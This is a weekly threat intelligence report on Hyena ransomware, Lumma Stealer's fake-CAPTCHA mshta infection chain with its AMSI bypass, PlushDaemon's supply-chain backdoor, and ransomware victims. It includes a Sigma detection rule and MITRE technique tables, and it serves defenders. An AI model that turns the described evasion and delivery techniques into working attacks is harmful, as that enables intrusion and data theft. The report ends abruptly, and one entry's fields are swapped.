Self Assessment

Weekly Intelligence Report – 31 Jan 2025

Published On : 2025-01-30
Share :
Weekly Intelligence Report – 31 Jan 2025

Ransomware of the week

CYFIRMA Research and Advisory Team would like to highlight ransomware trends and insights gathered while monitoring various forums. This includes multiple – industries, geography, and technology – that could be relevant to your organization.

Type: Ransomware
Target Technologies: MS Windows

Introduction
CYFIRMA Research and Advisory Team has found Hyena Ransomware while monitoring various underground forums as part of our Threat Discovery Process.

Hyena Ransomware
Researchers have identified a new ransomware strain named Hyena, linked to the MedusaLocker family. Hyena encrypts files, appending the “.hyena111” extension, and leaves a ransom note titled “READ_NOTE.html” while altering the desktop wallpaper.

Screenshot of files encrypted by ransomware (Source: Surface Web)

The ransom note informs victims that their network has been breached, and critical files are encrypted using RSA and AES algorithms. It warns against using third-party tools for file recovery, claiming such actions could lead to permanent data loss. The attackers also threaten to leak or sell confidential data if the ransom is not paid.

Victims are offered the chance to decrypt 2–3 non-essential files for free and are instructed to contact the attackers via provided email addresses or a Tor-based chat for negotiations. The note emphasizes that the ransom price will increase after 72 hours.

Appearance of Hyena’s ransom note (“READ_NOTE.html”): (Source: Surface Web)

Screenshot of Hyena’s desktop wallpaper: (Source: Surface Web)

Following are the TTPs based on the MITRE Attack Framework

Tactic ID Technique
Initial Access T1091 Replication Through Removable Media
Execution T1059 Command and Scripting Interpreter
Persistence T1542.003 Pre-OS Boot: Bootkit
Persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
Persistence T1574.002 Hijack Execution Flow: DLL Side-Loading
PrivilegeEscalation T1055 Process Injection
PrivilegeEscalation T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
PrivilegeEscalation T1574.002 Hijack Execution Flow: DLL Side-Loading
Defense Evasion T1014 Rootkit
Defense Evasion T1036 Masquerading
Defense Evasion T1055 Process Injection
Defense Evasion T1070.004 Indicator Removal: File Deletion
Defense Evasion T1112 Modify Registry
Defense Evasion T1202 Indirect Command Execution
Defense Evasion T1497 Virtualization/Sandbox Evasion
Defense Evasion T1542.003 Pre-OS Boot: Bootkit
Defense Evasion T1562.001 Impair Defenses: Disable or Modify Tools
Defense Evasion T1564.001 Hide Artifacts: Hidden Files and Directories
Defense Evasion T1574.002 Hijack Execution Flow: DLL Side-Loading
CredentialAccess T1056 Input Capture
Discovery T1010 Application Window Discovery
Discovery T1012 Query Registry
Discovery T1016 System Network Configuration Discovery
Discovery T1018 Remote System Discovery
Discovery T1082 System Information Discovery
Discovery T1083 File and Directory Discovery
Discovery T1120 Peripheral Device Discovery
Discovery T1497 Virtualization/Sandbox Evasion
Discovery T1518.001 Software Discovery: Security Software Discovery
LateralMovement T1091 Replication Through Removable Media
Collection T1056 Input Capture
Collection T1074 Data Staged
Commandand
Control
T1071 Application Layer Protocol
Command and Control T1095 Non-Application Layer Protocol
Command and Control T1573 Encrypted Channel
Impact T1485 Data Destruction
Impact T1486 Data Encrypted for Impact
Impact T1490 Inhibit System Recovery
Impact T1496 Resource Hijacking

Relevancy and Insights:

  • This ransomware specifically targets the widely used Windows Operating System, which is prevalent across numerous industries and organizations.
  • Detect-Debug-Environment: Debugging environments are used by developers to analyze and troubleshoot software. The ransomware uses this technique to determine whether it is operating in a debug environment. This feature aids the ransomware in avoiding analysis and detection attempts.
  • Calls to WMI: The ransomware is making calls to the Windows Management Instrumentation (WMI) framework. WMI is a powerful tool used by many legitimate applications and services, but it can also be exploited by malware to execute commands, collect information, or perform system modifications.
  • The ransomware’s attempt to delete Volume Shadow Copies (VSS) indicates a deliberate effort to hinder data recovery options for victims.

ETLM Assessment:
CYFIRMA’s analysis of available data reveals that MedusaLocker ransomware has been actively targeting diverse sectors including manufacturing, healthcare, finance, IT services and others since 2019. The emergence of Hyena ransomware, an advanced variant of MedusaLocker, suggests the adoption of enhanced evasion techniques aimed at expanding its reach to both individuals and enterprises. Projections indicate it will continue to impact key industries globally, highlighting the critical need for robust cybersecurity measures to effectively counter these evolving threats.

Sigma rule:
title: New RUN Key Pointing to Suspicious Folder tags:
– attack.persistence
– attack.t1547.001 logsource:
category: registry_set product: windows
detection: selection_target:
TargetObject|contains:
– ‘\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\’
– ‘\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\’ selection_details:
– Details|contains:
– ‘:\$Recycle.bin\’
– ‘:\Temp\’
– ‘:\Users\Default\’
– ‘:\Users\Desktop\’
– ‘:\Users\Public\’
– ‘:\Windows\Temp\’
– ‘\AppData\Local\Temp\’
– ‘%temp%\’
– ‘%tmp%\’
– Details|startswith:
– ‘%Public%\’
– ‘wscript’
– ‘cscript’
filter_main_windows_update:
TargetObject|contains: ‘\Microsoft\Windows\CurrentVersion\RunOnce\’ Image|startswith: ‘C:\Windows\SoftwareDistribution\Download\’ Details|contains|all:
– ‘rundll32.exe ‘
– ‘C:\WINDOWS\system32\advpack.dll,DelNodeRunDLL32’
Details|contains:
– ‘\AppData\Local\Temp\’
– ‘C:\Windows\Temp\’
condition: all of selection_* and not 1 of filter_main_* falsepositives:
– Software using weird folders for updates level: high
(Source: Surface Web)

IOCs:
Kindly refer to the IOCs section to exercise control of your security systems.

STRATEGIC RECOMMENDATION

  • Implement competent security protocols and encryption, authentication, or access credentials configurations to access critical systems in your cloud and local environments.
  • Ensure that backups of critical systems are maintained which can be used to restore data in case a need arises.

MANAGEMENT RECOMMENDATION

  • A data breach prevention plan must be developed considering, (a) the type of data being managed by the company; (b) the remediation process; (c) where and how the data is stored; (d) if there is an obligation to notify the local authority.
  • Enable zero-trust architecture and multifactor authentication (MFA) to mitigate the compromise of credentials.
  • Foster a culture of cybersecurity, where you encourage and invest in employee training so that security is an integral part of your organization.

TACTICAL RECOMMENDATION

  • Update all applications/software regularly with the latest versions and security patches alike.
  • Add the Sigma rule for threat detection and monitoring which will help to detect anomalies in log events, identify and monitor suspicious activities.
  • Build and undertake safeguarding measures by monitoring/ blocking the IOCs and strengthening defence based on the tactical intelligence provided.

Trending Malware of the Week

Type: Information Stealer | Objectives: Data theft | Target Industries: Telecom, Healthcare, Banking, Marketing | Target Geographies: United States, Argentina, Colombia, Philippines | Target Technology: Windows OS

CYFIRMA collects data from various forums based on which the trend is ascertained. We identified a few popular malwares that were found to be distributed in the wild to launch cyberattacks on organizations or individuals.

Active Malware of the week
This week “Lumma Stealer” is trending.

Lumma Stealer
Researchers have identified a global malware campaign leveraging fake CAPTCHAs to deliver Lumma Stealer, a malware-as-a-service (MaaS) threat active since 2022. This campaign targets victims across industries such as telecom, healthcare, banking, and marketing, with notable activity in countries like the United States, Argentina, Colombia, and the Philippines. The attackers utilize various delivery methods, such as cracked software, Discord’s CDN, and fake CAPTCHA pages. The infection chain employs diverse techniques, including process hollowing and PowerShell one-liners. The campaign introduces new payloads, malicious websites leveraging malvertising, and sophisticated strategies to bypass security controls. Notably, attackers instruct victims to execute commands via the Windows Run command, effectively evading browser-based defenses. Additionally, the use of open-source snippets to bypass the Windows Antimalware Scan Interface (AMSI) further enhances the malware’s ability to remain undetected.

Fig: Infection Chain

Attack Method
The infection process begins when a victim visits a website that redirects them to a fake CAPTCHA page. This deceptive CAPTCHA instructs the user to follow specific actions, initiating the next stage of the malware installation process. Since August 2024, Lumma Stealer has employed this tactic to trick users into running commands on their computers, effectively launching the infection. These fake CAPTCHAs are a sophisticated social engineering strategy, designed to make users unknowingly download and execute malware outside their browser. Even cautious users may fail to realize the implications of following these instructions. Executing the malware outside the browser also helps bypass browser-based security controls, making detection more challenging. In a recent campaign, the fake CAPTCHA instructs victims to open the Windows Run window using Windows+R, paste the clipboard’s content with CTRL+V, and press ENTER to execute it. This sequence, tailored for
Windows environments, is crucial for the malware’s deployment.

Fig: Fake CAPTCHA instruction

The website hosting the fake CAPTCHA uses a hidden JavaScript snippet to add a malicious command to the victim’s clipboard. This command utilizes the Windows tool mshta.exe to download and execute a file from a remote server. By leveraging mshta, a trusted Windows utility, attackers employ a technique known as LOLBIN to bypass security defenses by executing malicious code through legitimate system processes. Since the entire process occurs outside the browser, it effectively avoids detection by browser- based security measures.

Fig: Example of the malicious command in the Run window

The observed payloads in this campaign disguise themselves with misleading file extensions like .mp3 or .accdb, but their contents reveal a mix of random data, malicious JavaScript, and incorrect file types. Once executed, the JavaScript invokes PowerShell to decode a base64-encoded data chunk, triggering the download and execution of a second-stage payload on the victim’s machine. This second-stage payload is an obfuscated PowerShell script that performs several tasks. It deobfuscates strings, generates a key (“AMSI_RESULT_NOT_DETECTED”), and uses base64 decoding with a multi- byte XOR operation to extract another PowerShell script. This script employs a clever evasion tactic by modifying the memory of the “clr.dll” module to bypass Windows Antimalware Scan Interface (AMSI), preventing its detection. Finally, the script decodes another base64 chunk into a PE file, which it loads and executes via reflection. This process ultimately delivers Lumma Stealer as the final payload.

INSIGHTS

  • Lumma Stealer’s emergence in the malware-as-a-service (MaaS) ecosystem highlights the growing sophistication and accessibility of cybercrime tools. As a global threat, it represents a significant evolution in how attackers scale their operations to target diverse industries such as telecom, healthcare, and banking. The malware’s use of creative social engineering techniques, such as fake CAPTCHAs, showcases how attackers continue to exploit human behavior to bypass conventional cybersecurity defenses. This approach not only broadens the reach of these campaigns but also raises concerns about vulnerabilities in user awareness and behavior.
  • What sets Lumma Stealer apart is its adaptability in exploiting trusted tools and processes to remain undetected. By leveraging legitimate system utilities like mshta.exe and employing open-source techniques to bypass detection mechanisms, it highlights a clear shift toward exploiting the inherent trust in technology. This approach effectively lowers the barrier for cybercriminals, enabling them to target even organizations with robust defenses. Its ability to evade browser-based defenses by executing payloads outside the browser adds an additional layer of complexity for cybersecurity teams attempting to track and mitigate such attacks.
  • The infection chain employed by Lumma Stealer is not only diverse but also heavily obfuscated, incorporating advanced techniques such as PowerShell-based operations. The use of obfuscated scripts and memory manipulation to bypass the Windows Antimalware Scan Interface (AMSI) highlights the sophistication of its design. These methods ensure the malware can deliver its final payload without triggering red flags, enabling it to steal sensitive data effectively. Such campaigns underscore the increasing complexity of modern malware, necessitating continuous adaptation from cybersecurity teams.

ETLM ASSESSMENT
From the ETLM perspective, CYFIRMA anticipates that as Lumma Stealer continues to evolve, its ability to adapt to various attack vectors and exploit social engineering techniques could increase the difficulty for organizations to defend against it. The malware’s reliance on legitimate system processes and clever evasion tactics may allow it to bypass traditional security defenses, making it crucial for organizations to adopt broader, more comprehensive protection strategies. As the malware evolves, it could also expand its geographical reach, affecting organizations across different regions. Beyond direct financial or data losses, Lumma Stealer campaigns may erode trust within affected industries, especially as compromised credentials could facilitate secondary attacks, such as customer data breaches or supply chain disruptions. The continued growth of the malware-as-a-service model is likely to encourage similar threats, urging organizations to strengthen proactive and adaptive security measures through enhanced training, advanced detection tools, and cross-industry collaboration.

IOCs:
Kindly refer to the IOCs Section to exercise controls on your security systems.

Recommendations:

STRATEGIC:

  • Deploy an Extended Detection and Response (XDR) solution as part of the organization’s layered security strategy that provides detection/prevention for malware and malicious activities that do not rely on signature-based detection methods.
  • Configure organization’s intrusion detection systems (IDS), intrusion prevention systems (IPS), or any network defence mechanisms in place to alert on — and upon review, consider blocking connection attempts to and from — the external IP addresses and domains listed in the appendix.

MANAGEMENT:

  • Provide your staff with basic cybersecurity hygiene training since many targeted attacks start with phishing or other social engineering techniques.
  • Move beyond the traditional model of security awareness towards Improved Simulation and training exercises that mimic real attack scenarios, account for behaviors that lead to a compromise, and are measured against real attacks the organization receives.

TACTICAL RECOMMENDATIONS

  • Build and undertake safeguarding measures by monitoring/ blocking the IOCs and strengthening defence based on the tactical intelligence provided.
  • Install anti-APT and EDR solutions, enabling threat discovery and detection, investigation, and timely remediation of incidents capabilities.
  • Strengthen boundary defense such as network segmentation and have a strong access management capability in line with the Principle of Least Privilege (POLP) that can assist in mitigating cyberattacks.

CYFIRMA’S WEEKLY INSIGHTS

1. Weekly Attack Types and Trends

Key Intelligence Signals:

  • Attack Type: Ransomware Attacks, Malware Implant, Vulnerabilities & Exploits, Data Leaks.
  • Objective: Unauthorized Access, Data Theft, Data Encryption, Financial Gains, Espionage.
  • Business Impact: Data Loss, Financial Loss, Reputational Damage, Loss of Intellectual Property, Operational Disruption.
  • Ransomware – Lynx Ransomware, Hunters International Ransomware| Malware – Lumma Stealer
  • Lynx Ransomware – One of the ransomware groups.
  • Hunters International Ransomware – One of the ransomware groups.
  • Please refer to the trending malware advisory for details on the following:
  • Malware – Lumma Stealer
  • Behavior – Most of these malwares use phishing and social engineering techniques as their initial attack vectors. Apart from these techniques, exploitation of vulnerabilities, defense evasion, and persistence tactics are being observed.

2. Threat Actor in Focus

PlushDaemon infiltrates the supply chain of a Korean VPN service.

  • Threat actor: PlushDaemon
  • Initial Attack Vector: Malware implant
  • Objective: Espionage
  • Target Technology: VPN Services
  • Target Geography: China, Taiwan, Hong Kong, South Korea, the United States, and New Zealand.
  • Business Impact: Data exfiltration

Summary:
Recently, a sophisticated supply-chain attack was identified targeting a South Korean VPN provider. Attackers compromised the VPN’s installer, embedding a malicious backdoor alongside the legitimate software. This backdoor, known as SlowStepper, is a feature-rich tool with over 30 components designed for extensive cyberespionage activities.

The initial infection vector involved users downloading a ZIP archive containing the compromised installer from the VPN provider’s official website. Upon execution, the installer deployed both the legitimate VPN application and the SlowStepper backdoor. Persistence was achieved by adding a registry entry, ensuring the backdoor’s execution upon system startup.

SlowStepper operates through a multistage command-and-control (C&C) protocol utilizing DNS. It has the capability to download and execute numerous additional modules, primarily written in Python and Go, enhancing its espionage functionalities. These modules enable the malware to collect a wide range of data, including system details, running processes, installed applications, and network interfaces.

Furthermore, it can capture audio and video recordings, take photos, scan for documents, and extract information from various applications, including messaging platforms like WeChat and Telegram. Credential theft is also within its capabilities, posing significant risks to affected users.

The attackers’ primary method of initial access involves hijacking legitimate updates of applications by redirecting traffic to servers under their control. Additionally, they have been observed exploiting vulnerabilities in legitimate web servers to gain unauthorized access.

This campaign has been active since at least 2019, targeting individuals and entities across multiple regions, including mainland China, Taiwan, Hong Kong, South Korea, the United States, and New Zealand. The extensive toolkit and prolonged activity underscore the attackers’ commitment to developing a wide array of tools, making them a significant threat in the cyber landscape.

In response to the discovery, the compromised installer was promptly removed from the VPN provider’s website. However, users who downloaded the installer during the affected period are advised to conduct thorough security assessments to identify and remediate potential infections.

Relevancy & Insights:
The PlushDaemon threat actor group is a China-aligned sophisticated cyberespionage collective, primarily targeting East Asia, including South Korea, Taiwan, Hong Kong, and mainland China, with additional operations in the United States and New Zealand. The group is known for exploiting supply chain vulnerabilities and using trusted technologies such as VPNs and software updates to deploy malware. In one instance, they embedded a backdoor within a legitimate VPN installer.

Previously, PlushDaemon has taken advantage of web server vulnerabilities and DNS- based command-and-control (C&C) methods. Their toolkit consists of modular malware, reflecting the group’s adaptable and evolving tactics. With a focus on credential theft, data exfiltration, and surveillance, PlushDaemon’s operations demonstrate an ongoing refinement of their techniques.

ETLM Assessment:
PlushDaemon has a history of targeting across East Asia and beyond. Their operations often exploit trusted supply chains, allowing them to infiltrate networks with little chance of detection. The group is known for using sophisticated tactics, including modular malware and DNS-based command-and-control (C&C) techniques, to ensure long- term persistence and stealth.

They have frequently hijacked legitimate software updates or exploited vulnerabilities in web servers, tactics consistent with their past activity. PlushDaemon typically focuses on high-value targets in regions such as mainland China, South Korea, Taiwan, and Hong Kong, reflecting their strategic geopolitical interests.

Recommendations:

Strategic Recommendations:

  • Supply Chain Risk Management:
    • Implement a comprehensive supply chain risk management program to assess and monitor the security practices of third-party vendors and partners.
    • Establish contractual security requirements and conduct regular audits to ensure compliance.
  • Threat Intelligence Integration:
    • Continuously integrate threat intelligence feeds into your security operations to stay informed about emerging threats like PlushDaemon.

Tactical Recommendations:

  • Enhanced Monitoring and Detection:
    • Configure your Security Information and Event Management (SIEM) system to monitor indicators of compromise (IoCs) associated with SlowStepper and related malicious activities.
    • Implement behavioral analytics to detect anomalies in software installation processes and network communications.
  • Application Whitelisting:
    • Deploy application whitelisting to ensure that only authorized software can be executed within your environment, reducing the risk of malicious installers being executed.

Operational Recommendations:

  • Patch Management:
    • Regularly update and patch all software and systems to mitigate vulnerabilities that could be exploited by threat actors.
    • Prioritize patches for software commonly targeted in supply chain attacks.
  • User Training and Awareness:
    • Conduct regular security awareness training sessions to educate employees on the risks associated with downloading and installing software from unverified sources.
    • Encourage users to report any suspicious activities or anomalies promptly.
  • Incident Response Preparedness:
    • Ensure that your Security Operations Center (SOC) is equipped to respond swiftly to supply chain-related incidents.
    • Regularly test and update incident response plans to address scenarios involving compromised third-party software.
MITRE FRAMEWORK
Tactic Tactic ID Technique
Resource Development T1583.001 Acquire Infrastructure: Domains
Resource Development T1583.004 Acquire Infrastructure: Server
Resource Development T1608.001 Stage Capabilities: Upload Malware
Resource Development T1608.002 Stage Capabilities: Upload Tool
Resource Development T1588.001 Obtain Capabilities: Malware
Resource Development T1588.002 Obtain Capabilities: Tool
Resource Development T1588.003 Obtain Capabilities: Code Signing Certificates
Resource Development T1588.005 Obtain Capabilities: Exploits
Initial Access T1659 Content Injection
Initial Access T1190 Exploit Public-Facing Application
Initial Access T1195.002 Supply Chain Compromise: Compromise Software Supply Chain
Execution T1059.003 Command and Scripting Interpreter: Windows Command Shell
Execution T1059.006 Command and Scripting Interpreter: Python
Persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
Persistence T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL
Persistence T1574.002 Hijack Execution Flow: DLL Side-Loading
 
DefenseEvasion
 
T1222.001
File and Directory Permissions Modification: Windows File and Directory Permissions Modification
Defense Evasion T1070.004 Indicator Removal: File Deletion
Defense Evasion T1036.005 Masquerading: Match Legitimate Name or Location
Defense Evasion T1112 Modify Registry
Defense Evasion T1027.007 Obfuscated Files or Information: Dynamic API Resolution
Defense Evasion T1027.009 Obfuscated Files or Information: Embedded Payloads
Defense Evasion T1027.013 Obfuscated Files or Information: Encrypted/Encoded File
Defense Evasion T1553.002 Subvert Trust Controls: Code Signing
Discovery T1217 Browser Information Discovery
Discovery T1083 File and Directory Discovery
Discovery T1120 Peripheral Device Discovery
Discovery T1057 Process Discovery
Discovery T1012 Query Registry
Discovery T1518 Software Discovery
Discovery T1082 System Information Discovery
Discovery T1614 System Location Discovery
Discovery T1016 System Network Configuration Discovery
Discovery T1016.002 System Network Configuration Discovery: Wi-Fi Discovery
Discovery T1033 System Owner/User Discovery
Collection T1560.002 Archive Collected Data: Archive via Library
Collection T1123 Audio Capture
Collection T1005 Data from Local System
Collection T1074.001 Data Staged: Local Data Staging
Collection T1113 Screen Capture
Collection T1125 Video Capture
Command and Control T1071.004 Application Layer Protocol: DNS
Command and Control T1132.001 Data Encoding: Standard Encoding
Command and Control T1573.001 Encrypted Channel: Symmetric Cryptography
Command and Control T1008 Fallback Channels
Command and Control T1105 Remote File Copy
Command and Control T1104 Multi-Stage Channels
Command and Control T1095 Standard Non-Application Layer Protocol
Command and Control T1090 Connection Proxy
Command and Control T1219 Remote Access Tools
Exfiltration T1020 Automated Exfiltration
Exfiltration T1041 Exfiltration Over C2 Channel

IOCs:
Kindly refer to the IOCs (Indicators of Compromise) Section to exercise controls on your security systems.

3. Major Geopolitical Developments in Cybersecurity

EU sanctions three GRU officers for cyberattacks against Estonia
The European Union imposed sanctions on three Russian nationals for orchestrating cyberattacks against Estonia in 2020. The EU identified the individuals as officers of the GRU’s 161st Specialist Training Center, also known as Unit 29155.

In a statement, the EU explained that the attacks provided unauthorized access to classified and sensitive data from multiple government ministries, including Economic Affairs and Communications, Social Affairs, and Foreign Affairs. As a result, thousands of confidential documents—containing business secrets, health records, and other critical information—were stolen, jeopardizing the security of the affected institutions. The EU also attributed other cyberattacks against its member states and partners, particularly Ukraine, to Unit 29155.

With the latest enforcement action, a total of 17 individuals and four entities are subject to asset freezes and travel bans, in addition to prohibiting E.U. people and entities from transacting with those listed.

ETLM Assessment:
Unit 29155 has previously been accused by the U.S. government and its allies of carrying out cyberattacks targeting government services, financial institutions, transportation systems, energy infrastructure, and healthcare sectors across NATO member states, the European Union, as well as countries in Central America and Asia.

Since at least early 2022, the group is believed to have actively disrupted efforts to provide aid to Ukraine. Within the cybersecurity community, this threat actor is tracked under various names, including Cadet Blizzard, Ember Bear, FROZENVISTA, Nodaria, Ruinous Ursa, UAC-0056, and UNC2589.

Notably, Korchagin and Denisov have been charged by the U.S. Department of Justice (DoJ) for their alleged roles in a conspiracy to commit computer intrusion and wire fraud, targeting Ukraine, the U.S., and 25 other NATO countries.

President Trump indicates new tariffs on computer chips and semiconductors
President Donald Trump said he would soon announce new tariffs on computer chips, repeating a campaign promise that if enacted could have deep impacts on the global tech industry and the geopolitical battle over AI with China.

“In the very near future we’re going to be placing tariffs on foreign production of
computer chips, semiconductors, and pharmaceuticals to return production of
these essential goods to the United States of America,” Trump said at a retreat of
House Republicans at his Doral golf resort in Miami.

Trump said he wanted the manufacturers of semiconductors and chips — which are used in many high-end consumer electronics and sophisticated AI-powered technology and research — to open factories in the United States and would use the threat of high taxes and tariffs to force them to relocate. “They’re not going to want to pay a 25, 50 or even 100 percent tax,” Trump said. “If you want to stop paying the taxes or the tariffs, you have to build your plant right here in America.”

ETLM Assessment:
The news comes on the back of the recent announcement of technical advancements by Chinese AI startup DeepSeek, shortly followed by a similar announcement from another Chinese company, Alibaba. These rattled tech stocks in the US and showed the world that semiconductor restrictions that the previous US administration placed on China are not working as intended and U.S. companies will need to intensify their efforts to maintain the country’s leadership in artificial intelligence.

The disruptions in the semiconductor market are going to be one of the most intense areas of strategic competition between the US and China and we should expect a lot of state-sponsored cyber activity in the field in the coming years.

4. Rise in Malware / Ransomware and Phishing

The Lynx Ransomware Impacts Marukai

  • Attack Type: Ransomware
  • Target Industry: Retail
  • Target Geography: Japan, The United States of America
  • Ransomware: Lynx Ransomware
  • Objective: Data Theft, Data Encryption, Financial Gains
  • Business Impact: Financial Loss, Data Loss, Reputational Damage

Summary
From the External Threat Landscape Management (ETLM) Perspective, CYFIRMA observed in an underground forum that a company from Japan; Marukai(www[.]marukai[.]com), was compromised by Lynx Ransomware. Marukai Corporation (d.b.a Tokyo Central) opened its business as one of the first international Japan-based retailers in the US market. Marukai offers a wide variety of imported Japanese goods such as food, health products, cosmetics, home furnishings, electric appliances, stationery, clothing, pottery, and many other specialty goods. The compromised data consists of confidential and sensitive information related to the organization.

Source: Dark Web

Relevancy & Insights:

  • Lynx operates a well-organized affiliate panel that allows affiliates to manage victim profiles, generate custom ransomware samples, and schedule data leaks. Affiliates receive 80% of the ransom proceeds and handle negotiations, maintaining control over the ransom wallet. The platform includes features like a call center to harass victims and advanced storage solutions for high- performing affiliates.
  • Lynx employs double extortion methods by encrypting victims’ data and threatening to leak sensitive information if ransoms are not paid. They maintain a dedicated leak site where they publish announcements about attacks and disclose stolen data.
  • The Lynx Ransomware group primarily targets countries, such as the United States of America, the United Kingdom, Italy, Thailand, and Australia.
  • The Lynx Ransomware group primarily targets industries, including Retail, Heavy Construction, Specialized Consumer Services, Business Support Services, and Oil & Gas.
  • Based on the Lynx Ransomware victims list from 1st June 2024 to 29th Jan 2025, the top 5 Target Countries are as follows:
  • The Top 10 Industries, most affected by Lynx Ransomware from 1st June 2024 to 29th Jan 2025 are as follows:

ETLM Assessment:
According to CYFIRMA’s assessment, Lynx Ransomware represents a significant threat in the evolving landscape of cybercrime. Its sophisticated techniques and aggressive tactics necessitate robust cybersecurity measures from organizations to mitigate risks associated with ransomware attacks. As this group continues to operate, ongoing monitoring and analysis will be crucial for understanding their methods and developing effective defenses against them.

The Hunters International Ransomware Impacts PetroVietnam Exploration Production Corporation

  • Attack Type: Ransomware
  • Target Industry: Energy
  • Target Geography: Vietnam
  • Ransomware: Hunters International Ransomware
  • Objective: Data Theft, Data Encryption, Financial Gains
  • Business Impact: Financial Loss, Data Loss, Reputational Damage

Summary:
From the External Threat Landscape Management (ETLM) Perspective, CYFIRMA observed in an underground forum that a company from Vietnam; PetroVietnam Exploration Production Corporation(www[.]pvep[.]com[.]vn), was compromised by Hunters International Ransomware. PetroVietnam Exploration Production Corporation (PVEP) is the upstream subsidiary of the Vietnam Oil and Gas Group (PetroVietnam), responsible for oil and gas exploration and production activities both domestically and internationally. The compromised data includes confidential and sensitive information belonging to the organization. The scale of the data exposure measures approximately 1.3 TB, comprising a total of 2,43,580 discrete files.

Source: Dark Web

Relevancy & Insights:

  • Hunters International is a ransomware group that has gained significant attention since its emergence in October 2023. The group operates under a ransomware-as- a-service (RaaS) model and is known for its aggressive tactics, particularly focusing on data exfiltration alongside file encryption.
  • Recently we observed that Hunters International exploited vulnerabilities in Oracle WebLogic servers (CVE-2025-21535 CVSS Score; 9.8) to gain initial access to victim networks. This technique has been a common entry point for the group, allowing them to conduct reconnaissance and lateral movement before executing ransomware attacks.
  • Hunters International operates as a RaaS provider, allowing affiliates to use their infrastructure for attacks. This model has enabled them to expand their reach and impact significantly.
  • The Hunters International Ransomware group primarily targets countries, such as the United States of America, the United Kingdom, Canada, Spain, and India.
  • The Hunters International Ransomware group primarily targets industries, including Heavy Construction, Business Support Services, Government Agencies, Telecommunications, and Health Care Providers.
  • Based on the Hunters International Ransomware victims list from 1st Jan 2024 to 29th Jan 2025, the top 5 Target Countries are as follows:
  • The Top 10 Industries, most affected by Hunters International Ransomware from 1st Jan 2024 to 29th Jan 2025 are as follows:

ETLM Assessment:
According to CYFIRMA’s assessment, Hunters International ransomware represents a significant threat within the ransomware landscape due to its sophisticated tactics and focus on double extortion strategies. Organizations are advised to enhance their cybersecurity measures by implementing robust backup solutions, conducting regular employee training on phishing awareness, and maintaining updated security protocols to mitigate risks associated with this evolving threat actor. Continuous monitoring of Hunters International’s activities will be essential for understanding its impact on global cybersecurity efforts.

5. Vulnerabilities and Exploits

Vulnerability in ArgoCD

  • Attack Type: Vulnerabilities & Exploits
  • Target Technology: Kubernetes Controller
  • Vulnerability: CVE-2024-13484
  • CVSS Base Score: 8.2 Source
  • Vulnerability Type: Exposure of Resource to Wrong Sphere
  • Summary: A flaw was found in ArgoCD.

Relevancy & Insights: The openshift.io/cluster-monitoring label is applied to all namespaces that deploy an ArgoCD CR instance, allowing the namespace to create a rogue PrometheusRule.

Impact: This issue can have adverse effects on the platform monitoring stack, as the rule is rolled out cluster-wide when the label is applied.

Affected Products: https[:]//access[.]redhat[.]com/security/cve/CVE-2024-13484

Recommendations:
Monitoring and Detection: Implement monitoring and detection mechanisms to identify unusual system behavior that might indicate an attempted exploitation of this vulnerability.

TOP 5 AFFECTED TECHNOLOGIES OF THE WEEK

This week, CYFIRMA researchers have observed significant impacts on various technologies, due to a range of vulnerabilities. The following are the top 5 most affected technologies.

ETLM Assessment
Vulnerability in Argo CD can pose significant threats to user privacy and security. This can impact various industries globally, including technology, finance, healthcare, and beyond. Ensuring the security of Argo CD is crucial for maintaining the integrity and protection of users’ data worldwide. Therefore, addressing these vulnerabilities is essential to safeguarding declarative continuous delivery processes for Kubernetes, whether used as a standalone tool or as part of a CI/CD workflow, across different geographic regions and sectors.

6. Latest Cyber – Attacks, Incidents, and Breaches

DragonForce Ransomware attacked and published the data of PT PINS Indonesia

  • Threat Actor: DragonForce Ransomware
  • Attack Type: Ransomware
  • Objective: Data Leak, Financial Gains
  • Target Technology: Web Applications
  • Target Industry: Telecommunications, Information Technology
  • Target Geography: Indonesia
  • Business Impact: Operational Disruption, Data Loss, Financial Loss, Potential Reputational Damage

Summary:
Recently, we observed that DragonForce Ransomware attacked and published the data of PT PINS Indonesia(www[.]pins[.]co[.]id) on its dark web website. PT PINS Indonesia is a subsidiary of PT Telkom Indonesia Tbk, focusing on the integration of devices and networks within the telecommunications and information technology sectors. The company offers a range of services, including Managed Mobility Services, Managed Machine-to-Machine (M2M) Solution Services, and Managed Customer Premises Equipment (CPE) Services. The ransomware attack resulted in a data leak containing confidential and sensitive organizational information. The total size of compromised data is approximately 362.14 GB.

Source: Dark Web

Relevancy & Insights:

  • The DragonForce Ransomware group operates as a RaaS, allowing affiliates to customize and deploy their ransomware tools for specific attacks.
  • DragonForce Ransomware uses a double extortion strategy, which involves encrypting data on the victim’s servers and exfiltrating sensitive information. They threaten to leak this data if the ransom is not paid, increasing pressure on victims.
  • DragonForce Ransomware has targeted a variety of sectors, including manufacturing, healthcare, telecommunications, and government entities.

ETLM Assessment:
According to CYFIRMA’s assessment, DragonForce represents a significant threat in the ransomware landscape due to its advanced operational methods and extensive use of modified ransomware tools. As it continues to target high-profile organizations globally, ongoing vigilance and proactive cybersecurity strategies will be essential for mitigating risks associated with this formidable threat actor.
Organizations should remain alert to the evolving tactics employed by groups like DragonForce to protect their sensitive data and maintain operational integrity.

7. Data Leaks

Thrill Bicycle Data Advertised on a Leak Site

  • Attack Type: Data Leak
  • Target Industry: Manufacturing
  • Target Geography: Indonesia
  • Objective: Financial Gains
  • Business Impact: Data Loss, Reputational Damage

Summary:
The CYFIRMA Research team observed a data leak related to Thrill Bicycle (https://www[.]thrillbicycle[.]com) in an underground forum. Thrill Bicycle is a company specializing in the design and manufacture of bicycles tailored to the geometry of Asian riders. The leaked data includes ID, HP (phone number), name, code, city, address, telephone, province, and status. The breach has been linked to a threat actor identified as “AldzzXploit.”

Source: Underground forums

AsiaRecruit Malaysia Data Advertised on a Leak Site

  • Attack Type: Data Leak
  • Target Geography: Recruitment and Human Resources (HR)
  • Target Industry: Malaysia
  • Objective: Data Theft, Financial Gains
  • Business Impact: Data Loss, Reputational Damage

Summary:
